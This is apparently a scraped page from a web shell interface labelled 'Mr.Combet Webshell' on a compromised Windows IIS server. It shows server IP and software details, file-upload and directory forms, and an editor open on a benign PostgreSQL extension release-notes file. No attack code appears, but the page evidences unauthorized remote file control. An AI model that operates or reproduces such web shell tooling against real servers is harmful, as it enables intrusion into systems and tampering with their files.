Mr.Combet Webshell
Your IP :
216.73.216.136
Server IP :
103.233.58.157
Server :
Windows NT WIN-4PGF72KEHKB 10.0 build 17763 (Windows Server 2016) AMD64
Server Software :
Microsoft-IIS/10.0
PHP Version :
7.3.25
Add File :
Submit
Add Directory :
Submit
Dir :
C:
/
Program Files
/
PostgreSQL
/
14
/
docs
/
Edit File Name :
development.md
## Development In order to build and test your changes, simply run `./scripts/develop`. Documentation is generated from the sql files, using the script `scripts/documentaion` (requires poetry). ## Release Process 1. Update version number - Don't follow semver, simply use major and minor from H3 core and increment patch. - Version number should be changed in root `CMakeLists.txt`. - Set `INSTALL_VERSION` to "${PROJECT_VERSION}". - Update files (and cmake references) suffixed `--unreleased` should be renamed. - Installer `.sql` files should have `@ availability` comments updated. - Update changelog by moving from `Unreleased` to a new section - Push and merge changes in `release-x.y.z` branch. 2. Create a release on GitHub - Draft new release "vX.Y.Z" - Copy CHANGELOG.md entry into release description 3. Distribute the extension on PGXN - Run `scripts/bundle` to package the release - Upload the distribution on [PGXN Manager](https://manager.pgxn.org/) (username: `bytesandbrains`) 4. Prepare for development - Set `INSTALL_VERSION` to `unreleased` in root `CMakeLists.txt`. - Create new update files with `--unreleased` suffix. - Add them to relevant `CMakeLists.txt` files.
Save